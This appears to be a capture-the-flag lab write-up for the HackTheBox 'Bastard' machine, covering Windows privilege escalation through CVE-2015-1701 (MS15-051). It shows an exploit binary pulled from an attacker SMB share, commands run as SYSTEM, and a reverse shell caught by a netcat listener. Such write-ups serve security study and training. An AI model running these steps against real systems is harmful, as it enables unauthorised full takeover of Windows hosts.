InfoSec LAB

Bastard_Privilege_Escalation_2

Created: 2 min read

CVE-2015-1701(MS15-051)

CVE-2015-1701 is a privilege escalation vulnerability that exists in the Windows kernel-mode driver, specifically in the way it handles objects in memory. The vulnerability allows a local attacker to elevate their privileges on a vulnerable system to those of the kernel, which is the highest level of privilege on a Windows system. This can allow an attacker to take complete control of the system, and potentially access sensitive information or execute malicious code.

This vulnerability affects all versions of the Microsoft Windows operating system from Windows 7 and Windows Server 2008 R2 to Windows 8.1 and Windows Server 2012 R2. It does not require any user interaction and can be exploited by an attacker who has already gained access to a low-privileged account on the affected system.

Sherlock discovered this vulnerability

Exploit

The exploit was found here There were some trials and errors before landing a working exploit.

Privilege Escalation

ps c:\tmp> copy \\10.10.14.6\smb\ms15-051x64.exe
ps c:\tmp> .\ms15-051x64.exe
[#] ms15-051 fixed by zcgonvh
[#] usage: ms15-051 command 
[#] eg: ms15-051 "whoami /all"

I transported the binary and it shows the usage upon execution.

ps c:\tmp> .\ms15-051x64.exe whoami
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 2416 created.
==============================
nt authority\system

It just works.

ps c:\tmp> .\ms15-051x64.exe C:\tmp\pe.exe

I will be using the payload

┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.9] 49310
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\tmp> whoami
nt authority\system
ps c:\tmp> hostname
Bastard
ps c:\tmp> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 10.10.10.9
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{56fec108-3f71-4327-bf45-2b4ee355cd0f}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . : 
 
tunnel adapter local area connection* 9:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

System Level Compromise

Interactive Graph View

Backlinks